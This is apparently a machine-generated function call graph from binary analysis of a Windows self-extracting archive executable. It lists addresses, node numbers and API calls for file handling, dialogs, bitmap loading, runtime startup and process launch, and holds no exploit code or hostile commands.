24361->24362 24364 fb3396 ___std_exception_copy 24361->24364 24404 fa6ca7 75 API calls 24362->24404 24365 fb341c 24364->24365 24366 fb34c6 24364->24366 24370 fb3440 _abort 24364->24370 24405 fb32aa 75 API calls 3 library calls 24365->24405 24406 fc238d RaiseException 24366->24406 24369 fb34f2 24370->24345 24372 faab28 24371->24372 24374 faab32 24371->24374 24373 fbeb38 8 API calls 24372->24373 24373->24374 24374->24347 24376 fa921f __EH_prolog 24375->24376 24407 fa7c64 24376->24407 24379 fa13ba 78 API calls 24380 fa9231 24379->24380 24410 fad114 24380->24410 24382 fa928a 24382->24355 24383 fad114 118 API calls 24385 fa9243 24383->24385 24385->24382 24385->24383 24419 fad300 97 API calls __InternalCxxFrameHandler 24385->24419 24386->24337 24387->24357 24388->24340 24390 fad072 24389->24390 24391 fad084 24389->24391 24420 fa603a 82 API calls 24390->24420 24421 fa603a 82 API calls 24391->24421 24394 fad07c 24394->24341 24395->24355 24396->24357 24398 fb22a1 24397->24398 24399 fb22ba 24398->24399 24402 fb22ce 24398->24402 24422 fb0eed 86 API calls 24399->24422 24401 fb22c1 24401->24402 24403->24337 24404->24364 24405->24370 24406->24369 24408 fab146 GetVersionExW 24407->24408 24409 fa7c69 24408->24409 24409->24379 24417 fad12a __InternalCxxFrameHandler 24410->24417 24411 fad29a 24412 fad0cb 6 API calls 24411->24412 24413 fad2ce 24411->24413 24412->24413 24414 fb0e08 SetThreadExecutionState RaiseException 24413->24414 24416 fad291 24414->24416 24415 fb8c8d 103 API calls 24415->24417 24416->24385 24417->24411 24417->24415 24417->24416 24418 faac05 91 API calls 24417->24418 24418->24417 24419->24385 24420->24394 24421->24394 24422->24401 24423->24149 24424->24149 24425->24146 24427 fa5d2a 24426->24427 24473 fa5c4b 24427->24473 24429 fa5d5d 24431 fa5d95 24429->24431 24478 fab1dc CharUpperW CompareStringW _wcslen ___vcrt_InitializeCriticalSectionEx 24429->24478 24431->24163 24433 fa8186 24432->24433 24434 fa8232 24433->24434 24485 fabe5e 19 API calls __InternalCxxFrameHandler 24433->24485 24484 fb1fac CharUpperW 24434->24484 24437 fa823b 24437->24166 24439 fa7c22 24438->24439 24440 fa7c5a 24439->24440 24486 fa6e7a 74 API calls 24439->24486 24440->24177 24442 fa7c52 24487 fa138b 74 API calls 24442->24487 24444->24230 24446 fa9db3 24445->24446 24449 fa9dc2 24445->24449 24447 fa9db9 FlushFileBuffers 24446->24447 24446->24449 24447->24449 24448 fa9e3f SetFileTime 24448->24235 24449->24448 24450->24156 24451->24167 24452->24167 24453->24177 24454->24177 24455->24173 24456->24178 24457->24196 24458->24178 24460 fa98c5 GetFileType 24459->24460 24461 fa8b5a 24459->24461 24460->24461 24461->24184 24462 fa2021 74 API calls 24461->24462 24462->24198 24463->24184 24464->24200 24465->24225 24466->24225 24467->24225 24468->24225 24469->24225 24470->24228 24471->24238 24472->24229 24479 fa5b48 24473->24479 24475 fa5c6c 24475->24429 24477 fa5b48 2 API calls 24477->24475 24478->24429 24481 fa5b52 24479->24481 24480 fa5c3a 24480->24475 24480->24477 24481->24480 24483 fab1dc CharUpperW CompareStringW _wcslen ___vcrt_InitializeCriticalSectionEx 24481->24483 24483->24481 24484->24437 24485->24434 24486->24442 24487->24440 24489 facef2 24488->24489 24494 faa99e 24489->24494 24491 facf24 24492 faa99e 86 API calls 24491->24492 24493 facf2f 24492->24493 24495 faa9c1 24494->24495 24498 faa9d5 24494->24498 24499 fb0eed 86 API calls 24495->24499 24497 faa9c8 24497->24498 24498->24491 24499->24497 24500->24246 24502 faa6a8 24501->24502 24503 faa6c1 FindFirstFileW 24502->24503 24504 faa727 FindNextFileW 24502->24504 24505 faa6d0 24503->24505 24511 faa709 24503->24511 24506 faa732 GetLastError 24504->24506 24504->24511 24507 fabb03 GetCurrentDirectoryW 24505->24507 24506->24511 24508 faa6e0 24507->24508 24509 faa6fe GetLastError 24508->24509 24510 faa6e4 FindFirstFileW 24508->24510 24509->24511 24510->24509 24510->24511 24511->24100 24521 fba5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24512->24521 24514 fba5cd 24515 fba5d9 24514->24515 24522 fba605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24514->24522 24515->23752 24515->23753 24517->23756 24518->23762 24519->23762 24520->23765 24521->24514 24522->24515 24523->23773 24525 fa9f42 78 API calls 24524->24525 24526 fa1fe8 24525->24526 24527 fa1a04 101 API calls 24526->24527 24530 fa2005 24526->24530 24528 fa1ff5 24527->24528 24528->24530 24531 fa138b 74 API calls 24528->24531 24530->23781 24530->23782 24531->24530 24533 fbb5bc GetDlgItem 24532->24533 24534 fbb583 GetMessageW 24532->24534 24533->23792 24533->23793 24535 fbb599 IsDialogMessageW 24534->24535 24536 fbb5a8 TranslateMessage DispatchMessageW 24534->24536 24535->24533 24535->24536 24536->24533 24537 fa13e1 84 API calls 2 library calls 25288 fb94e0 GetClientRect 25326 fb21e0 26 API calls std::bad_exception::bad_exception 25349 fbf2e0 46 API calls __RTC_Initialize 24538 fbeae7 24539 fbeaf1 24538->24539 24540 fbe85d ___delayLoadHelper2@8 14 API calls 24539->24540 24541 fbeafe 24540->24541 25289 fbf4e7 29 API calls _abort 25350 fcbee0 GetCommandLineA GetCommandLineW 25351 fc0ada 51 API calls 2 library calls 25290 fbf4d3 20 API calls 24606 fbe1d1 14 API calls ___delayLoadHelper2@8 24608 fbe2d7 24609 fbe1db 24608->24609 24610 fbe85d ___delayLoadHelper2@8 14 API calls 24609->24610 24610->24609 25365 fd2bd0 VariantClear 24612 fa10d5 24617 fa5abd 24612->24617 24618 fa5ac7 __EH_prolog 24617->24618 24619 fab505 84 API calls 24618->24619 24620 fa5ad3 24619->24620 24624 fa5cac GetCurrentProcess GetProcessAffinityMask 24620->24624 25353 fb62ca 123 API calls __InternalCxxFrameHandler 24630 fbdec2 24631 fbdecf 24630->24631 24632 fae617 53 API calls 24631->24632 24633 fbdedc 24632->24633 24634 fa4092 _swprintf 51 API calls 24633->24634 24635 fbdef1 SetDlgItemTextW 24634->24635 24636 fbb568 5 API calls 24635->24636 24637 fbdf0e 24636->24637 25328 fbb5c0 100 API calls 25367 fb77c0 118 API calls 25368 fbffc0 RaiseException _com_raise_error _com_error::_com_error 25369 fb1bbd GetCPInfo IsDBCSLeadByte 24648 fbf3b2 24649 fbf3be __FrameHandler3::FrameUnwindToState 24648->24649 24680 fbeed7 24649->24680 24651 fbf3c5 24652 fbf518 24651->24652 24655 fbf3ef 24651->24655 24753 fbf838 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter _abort 24652->24753 24654 fbf51f 24746 fc7f58 24654->24746 24668 fbf42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 24655->24668 24691 fc8aed 24655->24691 24662 fbf40e 24664 fbf48f 24699 fbf953 GetStartupInfoW _abort 24664->24699 24666 fbf495 24700 fc8a3e 51 API calls 24666->24700 24668->24664 24749 fc7af4 38 API calls _abort 24668->24749 24670 fbf49d 24701 fbdf1e 24670->24701 24674 fbf4b1 24674->24654 24675 fbf4b5 24674->24675 24676 fbf4be 24675->24676 24751 fc7efb 28 API calls _abort 24675->24751 24752 fbf048 12 API calls ___scrt_uninitialize_crt 24676->24752 24679 fbf4c6 24679->24662 24681 fbeee0 24680->24681 24755 fbf654 IsProcessorFeaturePresent 24681->24755 24683 fbeeec 24756 fc2a5e 24683->24756 24685 fbeef1 24686 fbeef5 24685->24686 24764 fc8977 24685->24764 24686->24651 24689 fbef0c 24689->24651 24694 fc8b04 24691->24694 24692 fbfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24693 fbf408 24692->24693 24693->24662 24695 fc8a91 24693->24695 24694->24692 24697 fc8ac0 24695->24697 24696 fbfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24698 fc8ae9 24696->24698 24697->24696 24698->24668 24699->24666 24700->24670 24857 fb0863 24701->24857 24705 fbdf3d 24906 fbac16 24705->24906 24707 fbdf46 _abort 24708 fbdf59 GetCommandLineW 24707->24708 24709 fbdf68 24708->24709 24710 fbdfe6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 24708->24710 24910 fbc5c4 24709->24910 24711 fa4092 _swprintf 51 API calls 24710->24711 24713 fbe04d SetEnvironmentVariableW GetModuleHandleW LoadIconW 24711->24713 24921 fbb6dd LoadBitmapW 24713->24921 24716 fbdfe0 24915 fbdbde 24716->24915 24717 fbdf76 OpenFileMappingW 24719 fbdf8f MapViewOfFile 24717->24719 24720 fbdfd6 CloseHandle 24717->24720 24723 fbdfcd UnmapViewOfFile 24719->24723 24724 fbdfa0 __InternalCxxFrameHandler 24719->24724 24720->24710 24723->24720 24728 fbdbde 2 API calls 24724->24728 24730 fbdfbc 24728->24730 24729 fb90b7 8 API calls 24731 fbe0aa DialogBoxParamW 24729->24731 24730->24723 24732 fbe0e4 24731->24732 24733 fbe0fd 24732->24733 24734 fbe0f6 Sleep 24732->24734 24737 fbe10b 24733->24737 24951 fbae2f CompareStringW SetCurrentDirectoryW _abort _wcslen 24733->24951 24734->24733 24736 fbe12a DeleteObject 24738 fbe13f DeleteObject 24736->24738 24739 fbe146 24736->24739 24737->24736 24738->24739 24740 fbe189 24739->24740 24741 fbe177 24739->24741 24948 fbac7c 24740->24948 24952 fbdc3b 6 API calls 24741->24952 24743 fbe17d CloseHandle 24743->24740 24745 fbe1c3 24750 fbf993 GetModuleHandleW 24745->24750 25084 fc7cd5 24746->25084 24749->24664 24750->24674 24751->24676 24752->24679 24753->24654 24755->24683 24768 fc3b07 24756->24768 24759 fc2a67 24759->24685 24761 fc2a6f 24762 fc2a7a 24761->24762 24782 fc3b43 DeleteCriticalSection 24761->24782 24762->24685 24811 fcc05a 24764->24811 24767 fc2a7d 7 API calls 2 library calls 24767->24686 24769 fc3b10 24768->24769 24771 fc3b39 24769->24771 24773 fc2a63 24769->24773 24783 fc3d46 24769->24783 24788 fc3b43 DeleteCriticalSection 24771->24788 24773->24759 24774 fc2b8c 24773->24774 24804 fc3c57 24774->24804 24778 fc2bbc 24778->24761 24779 fc2baf 24779->24778 24810 fc2bbf 6 API calls ___vcrt_FlsFree 24779->24810 24781 fc2ba1 24781->24761 24782->24759 24789 fc3c0d 24783->24789 24786 fc3d7e InitializeCriticalSectionAndSpinCount 24787 fc3d69 24786->24787 24787->24769 24788->24773 24790 fc3c26 24789->24790 24791 fc3c4f 24789->24791 24790->24791 24796 fc3b72 24790->24796 24791->24786 24791->24787 24794 fc3c3b GetProcAddress 24794->24791 24795 fc3c49 24794->24795 24795->24791 24798 fc3b7e ___vcrt_InitializeCriticalSectionEx 24796->24798 24797 fc3bf3 24797->24791 24797->24794 24798->24797 24799 fc3b95 LoadLibraryExW 24798->24799 24803 fc3bd5 LoadLibraryExW 24798->24803 24800 fc3bfa 24799->24800 24801 fc3bb3 GetLastError 24799->24801 24800->24797 24802 fc3c02 FreeLibrary 24800->24802 24801->24798 24802->24797 24803->24798 24803->24800 24805 fc3c0d ___vcrt_InitializeCriticalSectionEx 5 API calls 24804->24805 24806 fc3c71 24805->24806 24807 fc3c8a TlsAlloc 24806->24807 24808 fc2b96 24806->24808 24808->24781 24809 fc3d08 6 API calls ___vcrt_InitializeCriticalSectionEx 24808->24809 24809->24779 24810->24781 24814 fcc077 24811->24814 24815 fcc073 24811->24815 24812 fbfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24813 fbeefe 24812->24813 24813->24689 24813->24767 24814->24815 24817 fca6a0 24814->24817 24815->24812 24818 fca6ac __FrameHandler3::FrameUnwindToState 24817->24818 24829 fcac31 EnterCriticalSection 24818->24829 24820 fca6b3 24830 fcc528 24820->24830 24822 fca6c2 24828 fca6d1 24822->24828 24843 fca529 29 API calls 24822->24843 24825 fca6cc 24844 fca5df GetStdHandle GetFileType 24825->24844 24827 fca6e2 _abort 24827->24814 24845 fca6ed LeaveCriticalSection _abort 24828->24845 24829->24820 24831 fcc534 __FrameHandler3::FrameUnwindToState 24830->24831 24832 fcc558 24831->24832 24833 fcc541 24831->24833 24846 fcac31 EnterCriticalSection 24832->24846 24854 fc91a8 20 API calls _abort 24833->24854 24836 fcc546 24855 fc9087 26 API calls _abort 24836->24855 24838 fcc550 _abort 24838->24822 24839 fcc590 24856 fcc5b7 LeaveCriticalSection _abort 24839->24856 24841 fcc564 24841->24839 24847 fcc479 24841->24847 24843->24825 24844->24828 24845->24827 24846->24841 24848 fcb136 _abort 20 API calls 24847->24848 24849 fcc48b 24848->24849 24851 fcaf0a 11 API calls 24849->24851 24853 fcc498 24849->24853 24850 fc8dcc _free 20 API calls 24852 fcc4ea 24850->24852 24851->24849 24852->24841 24853->24850 24854->24836 24855->24838 24856->24838 24858 fbec50 24857->24858 24859 fb086d GetModuleHandleW 24858->24859 24860 fb0888 GetProcAddress 24859->24860 24861 fb08e7 24859->24861 24863 fb08b9 GetProcAddress 24860->24863 24864 fb08a1 24860->24864 24862 fb0c14 GetModuleFileNameW 24861->24862 24962 fc75fb 42 API calls 2 library calls 24861->24962 24865 fb0c32 24862->24865 24872 fb08cb 24863->24872 24864->24863 24876 fb0c94 GetFileAttributesW 24865->24876 24878 fb0c5d CompareStringW 24865->24878 24879 fb0cac 24865->24879 24953 fab146 24865->24953 24956 fb081b 24865->24956 24867 fb0b54 24867->24862 24868 fb0b5f GetModuleFileNameW CreateFileW 24867->24868 24869 fb0c08 CloseHandle 24868->24869 24870 fb0b8f SetFilePointer 24868->24870 24869->24862 24870->24869 24871 fb0b9d ReadFile 24870->24871 24871->24869 24875 fb0bbb 24871->24875 24872->24861 24875->24869 24877 fb081b 2 API calls 24875->24877 24876->24865 24876->24879 24877->24875 24878->24865 24880 fb0cb7 24879->24880 24882 fb0cec 24879->24882 24883 fb0cd0 GetFileAttributesW 24880->24883 24884 fb0ce8 24880->24884 24881 fb0dfb 24905 fba64d GetCurrentDirectoryW 24881->24905 24882->24881 24885 fab146 GetVersionExW 24882->24885 24883->24880 24883->24884 24884->24882 24886 fb0d06 24885->24886 24887 fb0d0d 24886->24887 24888 fb0d73 24886->24888 24890 fb081b 2 API calls 24887->24890 24889 fa4092 _swprintf 51 API calls 24888->24889 24891 fb0d9b AllocConsole 24889->24891 24892 fb0d17 24890->24892 24893 fb0da8 GetCurrentProcessId AttachConsole 24891->24893 24894 fb0df3 ExitProcess 24891->24894 24895 fb081b 2 API calls 24892->24895 24963 fc3e13 24893->24963 24897 fb0d21 24895->24897 24899 fae617 53 API calls 24897->24899 24898 fb0dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 24898->24894 24900 fb0d3c 24899->24900 24901 fa4092 _swprintf 51 API calls 24900->24901 24902 fb0d4f 24901->24902 24903 fae617 53 API calls 24902->24903 24904 fb0d5e 24903->24904 24904->24894 24905->24705 24907 fb081b 2 API calls 24906->24907 24908 fbac2a OleInitialize 24907->24908 24909 fbac4d GdiplusStartup SHGetMalloc 24908->24909 24909->24707 24912 fbc5ce 24910->24912 24911 fbc6e4 24911->24716 24911->24717 24912->24911 24913 fb1fac CharUpperW 24912->24913 24965 faf3fa 82 API calls 2 library calls 24912->24965 24913->24912 24916 fbec50 24915->24916 24917 fbdbeb SetEnvironmentVariableW 24916->24917 24919 fbdc0e 24917->24919 24918 fbdc36 24918->24710 24919->24918 24920 fbdc2a SetEnvironmentVariableW 24919->24920 24920->24918 24922 fbb70b GetObjectW 24921->24922 24923 fbb6fe 24921->24923 24925 fbb71a 24922->24925 24966 fba6c2 FindResourceW 24923->24966 24927 fba5c6 4 API calls 24925->24927 24928 fbb72d 24927->24928 24929 fbb770 24928->24929 24930 fbb74c 24928->24930 24931 fba6c2 13 API calls 24928->24931 24940 fada42 24929->24940 24982 fba605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24930->24982 24933 fbb73d 24931->24933 24933->24930 24935 fbb743 DeleteObject 24933->24935 24934 fbb754 24983 fba5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24934->24983 24935->24930 24937 fbb75d 24984 fba80c 8 API calls 24937->24984 24939 fbb764 DeleteObject 24939->24929 24993 fada67 24940->24993 24945 fb90b7 24946 fbeb38 8 API calls 24945->24946 24947 fb90d6 24946->24947 24947->24729 24949 fbacab GdiplusShutdown CoUninitialize 24948->24949 24949->24745 24951->24737 24952->24743 24954 fab15a GetVersionExW 24953->24954 24955 fab196 24953->24955 24954->24955 24955->24865 24957 fbec50 24956->24957 24958 fb0828 GetSystemDirectoryW 24957->24958 24959 fb085e 24958->24959 24960 fb0840 24958->24960 24959->24865 24961 fb0851 LoadLibraryW 24960->24961 24961->24959 24962->24867 24964 fc3e1b 24963->24964 24964->24898 24964->24964 24965->24912 24967 fba6e5 SizeofResource 24966->24967 24972 fba7d3 24966->24972 24968 fba6fc LoadResource 24967->24968 24967->24972 24969 fba711 LockResource 24968->24969 24968->24972 24970 fba722 GlobalAlloc 24969->24970 24969->24972 24971 fba73d GlobalLock 24970->24971 24970->24972 24973 fba7cc GlobalFree 24971->24973 24974 fba74c __InternalCxxFrameHandler 24971->24974 24972->24922 24972->24925 24973->24972 24975 fba754 CreateStreamOnHGlobal 24974->24975 24976 fba76c 24975->24976 24977 fba7c5 GlobalUnlock 24975->24977 24985 fba626 GdipAlloc 24976->24985 24977->24973 24980 fba79a GdipCreateHBITMAPFromBitmap 24981 fba7b0 24980->24981 24981->24977 24982->24934 24983->24937 24984->24939 24986 fba638 24985->24986 24987 fba645 24985->24987 24989 fba3b9 24986->24989 24987->24977 24987->24980 24987->24981 24990 fba3da GdipCreateBitmapFromStreamICM 24989->24990 24991 fba3e1 GdipCreateBitmapFromStream 24989->24991 24992 fba3e6 24990->24992 24991->24992 24992->24987 24994 fada75 __EH_prolog 24993->24994 24995 fadaa4 GetModuleFileNameW 24994->24995 24996 fadad5 24994->24996 24997 fadabe 24995->24997 25039 fa98e0 24996->25039 24997->24996 24999 fadb31 25050 fc6310 24999->25050 25000 fa959a 80 API calls 25001 fada4e 25000->25001 25037 fae29e GetModuleHandleW FindResourceW 25001->25037 25003 fadb05 25003->24999 25005 fae261 78 API calls 25003->25005 25018 fadd4a 25003->25018 25004 fadb44 25006 fc6310 26 API calls 25004->25006 25005->25003 25014 fadb56 ___vcrt_InitializeCriticalSectionEx 25006->25014 25007 fadc85 25007->25018 25070 fa9d70 81 API calls 25007->25070 25009 fa9e80 79 API calls 25009->25014 25011 fadc9f ___std_exception_copy 25012 fa9bd0 82 API calls 25011->25012 25011->25018 25015 fadcc8 ___std_exception_copy 25012->25015 25014->25007 25014->25009 25014->25018 25064 fa9bd0 25014->25064 25069 fa9d70 81 API calls 25014->25069 25017 fadcd3 _wcslen ___std_exception_copy ___vcrt_InitializeCriticalSectionEx 25015->25017 25015->25018 25071 fb1b84 MultiByteToWideChar 25015->25071 25017->25018 25020 fae159 25017->25020 25033 fb1da7 WideCharToMultiByte 25017->25033 25072 fae5b1 50 API calls __vsnprintf 25017->25072 25073 fc6159 26 API calls 3 library calls 25017->25073 25074 fc8cce 26 API calls 2 library calls 25017->25074 25075 fc7625 26 API calls 2 library calls 25017->25075 25076 fae27c 78 API calls 25017->25076 25018->25000 25024 fae1de 25020->25024 25077 fc8cce 26 API calls 2 library calls 25020->25077 25021 fae16e 25078 fc7625 26 API calls 2 library calls 25021->25078 25023 fae1c6 25079 fae27c 78 API calls 25023->25079 25025 fae214 25024->25025 25030 fae261 78 API calls 25024->25030 25028 fc6310 26 API calls 25025->25028 25029 fae22d 25028->25029 25031 fc6310 26 API calls 25029->25031 25030->25024 25031->25018 25033->25017 25038 fada55 25037->25038 25038->24945 25040 fa98ea 25039->25040 25041 fa994b CreateFileW 25040->25041 25042 fa996c GetLastError 25041->25042 25045 fa99bb 25041->25045 25043 fabb03 GetCurrentDirectoryW 25042->25043 25044 fa998c 25043->25044 25044->25045 25046 fa9990 CreateFileW GetLastError 25044->25046 25047 fa99e5 SetFileTime 25045->25047 25048 fa99ff 25045->25048 25046->25045 25049 fa99b5 25046->25049 25047->25048 25048->25003 25049->25045 25051 fc6349 25050->25051 25052 fc634d 25051->25052 25063 fc6375 25051->25063 25080 fc91a8 20 API calls _abort 25052->25080 25054 fc6699 25056 fbfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25054->25056 25055 fc6352 25081 fc9087 26 API calls _abort 25055->25081 25059 fc66a6 25056->25059 25058 fc635d 25060 fbfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25058->25060 25059->25004 25061 fc6369 25060->25061 25061->25004 25063->25054 25082 fc6230 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25063->25082 25065 fa9bdc 25064->25065 25066 fa9be3 25064->25066 25065->25014 25066->25065 25068 fa9785 GetStdHandle ReadFile GetLastError GetLastError GetFileType 25066->25068 25083 fa6d1a 77 API calls 25066->25083 25068->25066 25069->25014 25070->25011 25071->25017 25072->25017 25073->25017 25074->25017 25075->25017 25076->25017 25077->25021 25078->25023 25079->25024 25080->25055 25081->25058 25082->25063 25083->25066 25085 fc7ce1 _abort 25084->25085 25086 fc7ce8 25085->25086 25087 fc7cfa 25085->25087 25120 fc7e2f GetModuleHandleW 25086->25120 25108 fcac31 EnterCriticalSection 25087->25108 25090 fc7ced 25090->25087 25121 fc7e73 GetModuleHandleExW 25090->25121 25094 fc7d76 25098 fc7d8e 25094->25098 25103 fc8a91 _abort 5 API calls 25094->25103 25096 fc7dbc 25112 fc7dee 25096->25112 25097 fc7de8 25130 fd2390 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25097->25130 25104 fc8a91 _abort 5 API calls 25098->25104 25099 fc7d01 25099->25094 25105 fc7d9f 25099->25105 25129 fc87e0 20 API calls _abort 25099->25129 25103->25098 25104->25105 25109 fc7ddf 25105->25109 25108->25099 25131 fcac81 LeaveCriticalSection 25109->25131 25111 fc7db8 25111->25096 25111->25097 25132 fcb076 25112->25132 25115 fc7e1c 25117 fc7e73 _abort 8 API calls 25115->25117 25116 fc7dfc GetPEB 25116->25115 25118 fc7e0c GetCurrentProcess TerminateProcess 25116->25118 25119 fc7e24 ExitProcess 25117->25119 25118->25115 25120->25090 25122 fc7e9d GetProcAddress 25121->25122 25123 fc7ec0 25121->25123 25128 fc7eb2 25122->25128 25124 fc7ecf 25123->25124 25125 fc7ec6 FreeLibrary 25123->25125 25126 fbfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25124->25126 25125->25124 25127 fc7cf9 25126->25127 25127->25087 25128->25123 25129->25094 25131->25111 25133 fcb09b 25132->25133 25137 fcb091 25132->25137 25134 fcac98 _abort 5 API calls 25133->25134 25134->25137 25135 fbfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25136 fc7df8 25135->25136 25136->25115 25136->25116 25137->25135 25138 fbe5b1 25139 fbe578 25138->25139 25139->25138 25140 fbe85d ___delayLoadHelper2@8 14 API calls 25139->25140 25140->25139 25329 fbb1b0 GetDlgItem EnableWindow ShowWindow SendMessageW 25371 fa6faa 111 API calls 3 library calls 25293 fbdca1 DialogBoxParamW 25372 fbf3a0 27 API calls 25296 fca4a0 71 API calls _free 25332 fbeda7 48 API calls _unexpected 25297 fd08a0 IsProcessorFeaturePresent 25298 fcb49d 6 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25300 fbc793 97 API calls 4 library calls 25334 fbb18d 78 API calls 25335 fb9580 6 API calls 25355 fbc793 102 API calls 4 library calls 23349 fa9f7a 23350 fa9f88 23349->23350 23351 fa9f8f 23349->23351 23352 fa9f9c GetStdHandle 23351->23352 23359 fa9fab 23351->23359 23352->23359 23353 faa003 WriteFile 23353->23359 23354 fa9fcf 23355 fa9fd4 WriteFile 23354->23355 23354->23359 23355->23354 23355->23359 23357 faa095 23361 fa6e98 77 API calls 23357->23361 23359->23350 23359->23353 23359->23354 23359->23355 23359->23357 23360 fa6baa 78 API calls 23359->23360 23360->23359 23361->23350 25374 fa1f72 128 API calls __EH_prolog 25303 fba070 10 API calls 25356 fbb270 99 API calls 23418 fa9a74 23421 fa9a7e 23418->23421 23419 fa9b9d SetFilePointer 23420 fa9bb6 GetLastError 23419->23420 23423 fa9ab1 23419->23423 23420->23423 23421->23419 23421->23423 23424 fa9b79 23421->23424 23425 fa981a 23421->23425 23424->23419 23426 fa9833 23425->23426 23429 fa9e80 23426->23429 23430 fa9e92 23429->23430 23434 fa9ea5 23429->23434 23433 fa9865 23430->23433 23438 fa6d5b 77 API calls 23430->23438 23432 fa9eb8 SetFilePointer 23432->23433 23435 fa9ed4 GetLastError 23432->23435 23433->23424 23434->23432 23434->23433 23435->23433 23436 fa9ede 23435->23436 23436->23433 23439 fa6d5b 77 API calls 23436->23439 23438->23434 23439->23433 25305 fa1075 84 API calls 25306 fbc793 107 API calls 4 library calls 23440 fbe569 23441 fbe517 23440->23441 23441->23440 23443 fbe85d 23441->23443 23469 fbe5bb 23443->23469 23445 fbe86d 23446 fbe8ca 23445->23446 23457 fbe8ee 23445->23457 23447 fbe7fb DloadReleaseSectionWriteAccess 6 API calls 23446->23447 23448 fbe8d5 RaiseException 23447->23448 23463 fbeac3 23448->23463 23449 fbe9d9 23453 fbea95 23449->23453 23456 fbea37 GetProcAddress 23449->23456 23450 fbe966 LoadLibraryExA 23451 fbe979 GetLastError 23450->23451 23452 fbe9c7 23450->23452 23455 fbe9a2 23451->23455 23462 fbe98c 23451->23462 23452->23449 23454 fbe9d2 FreeLibrary 23452->23454 23478 fbe7fb 23453->23478 23454->23449 23458 fbe7fb DloadReleaseSectionWriteAccess 6 API calls 23455->23458 23456->23453 23459 fbea47 GetLastError 23456->23459 23457->23449 23457->23450 23457->23452 23457->23453 23460 fbe9ad RaiseException 23458->23460 23465 fbea5a 23459->23465 23460->23463 23462->23452 23462->23455 23463->23441 23464 fbe7fb DloadReleaseSectionWriteAccess 6 API calls 23466 fbea7b RaiseException 23464->23466 23465->23453 23465->23464 23467 fbe5bb ___delayLoadHelper2@8 6 API calls 23466->23467 23468 fbea92 23467->23468 23468->23453 23470 fbe5ed 23469->23470 23471 fbe5c7 23469->23471 23470->23445 23486 fbe664 23471->23486 23473 fbe5cc 23475 fbe5e8 23473->23475 23489 fbe78d 23473->23489 23494 fbe5ee GetModuleHandleW GetProcAddress GetProcAddress 23475->23494 23477 fbe836 23477->23445 23479 fbe82f 23478->23479 23480 fbe80d 23478->23480 23479->23463 23481 fbe664 DloadReleaseSectionWriteAccess 3 API calls 23480->23481 23482 fbe812 23481->23482 23483 fbe82a 23482->23483 23484 fbe78d DloadProtectSection 3 API calls 23482->23484 23497 fbe831 GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 23483->23497 23484->23483 23495 fbe5ee GetModuleHandleW GetProcAddress GetProcAddress 23486->23495 23488 fbe669 23488->23473 23492 fbe7a2 DloadProtectSection 23489->23492 23490 fbe7a8 23490->23475 23491 fbe7dd VirtualProtect 23491->23490 23492->23490 23492->23491 23496 fbe6a3 VirtualQuery GetSystemInfo 23492->23496 23494->23477 23495->23488 23496->23491 23497->23479 25376 fc7f6e 52 API calls 3 library calls 25357 fc8268 55 API calls _free 24543 fbcd58 24544 fbce22 24543->24544 24550 fbcd7b 24543->24550 24560 fbc793 _wcslen _wcsrchr 24544->24560 24571 fbd78f 24544->24571 24545 fbb314 ExpandEnvironmentStringsW 24545->24560 24547 fbd40a 24549 fb1fbb CompareStringW 24549->24550 24550->24544 24550->24549 24551 fbca67 SetWindowTextW 24551->24560 24554 fc3e3e 22 API calls 24554->24560 24556 fbc855 SetFileAttributesW 24558 fbc90f GetFileAttributesW 24556->24558 24559 fbc86f _abort _wcslen 24556->24559 24558->24560 24562 fbc921 DeleteFileW 24558->24562 24559->24558 24559->24560 24596 fab991 51 API calls 2 library calls 24559->24596 24560->24545 24560->24547 24560->24551 24560->24554 24560->24556 24563 fbcc31 GetDlgItem SetWindowTextW SendMessageW 24560->24563 24565 fbcc71 SendMessageW 24560->24565 24570 fb1fbb CompareStringW 24560->24570 24595 fba64d GetCurrentDirectoryW 24560->24595 24597 faa5d1 6 API calls 24560->24597 24598 faa55a FindClose 24560->24598 24599 fbb48e 76 API calls 2 library calls 24560->24599 24562->24560 24567 fbc932 24562->24567 24563->24560 24564 fa4092 _swprintf 51 API calls 24566 fbc952 GetFileAttributesW 24564->24566 24565->24560 24566->24567 24568 fbc967 MoveFileW 24566->24568 24567->24564 24568->24560 24569 fbc97f MoveFileExW 24568->24569 24569->24560 24570->24560 24573 fbd799 _abort _wcslen 24571->24573 24572 fbd9e7 24572->24560 24573->24572 24574 fbd8a5 24573->24574 24575 fbd9c0 24573->24575 24600 fb1fbb CompareStringW 24573->24600 24577 faa231 3 API calls 24574->24577 24575->24572 24579 fbd9de ShowWindow 24575->24579 24578 fbd8ba 24577->24578 24580 fbd8d9 ShellExecuteExW 24578->24580 24601 fab6c4 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW 24578->24601 24579->24572 24580->24572 24582 fbd8ec 24580->24582 24584 fbd925 24582->24584 24585 fbd97b CloseHandle 24582->24585 24589 fbd91b ShowWindow 24582->24589 24583 fbd8d1 24583->24580 24602 fbdc3b 6 API calls 24584->24602 24586 fbd989 24585->24586 24587 fbd994 24585->24587 24603 fb1fbb CompareStringW 24586->24603 24587->24575 24589->24584 24591 fbd93d 24591->24585 24592 fbd950 GetExitCodeProcess 24591->24592 24592->24585 24593 fbd963 24592->24593 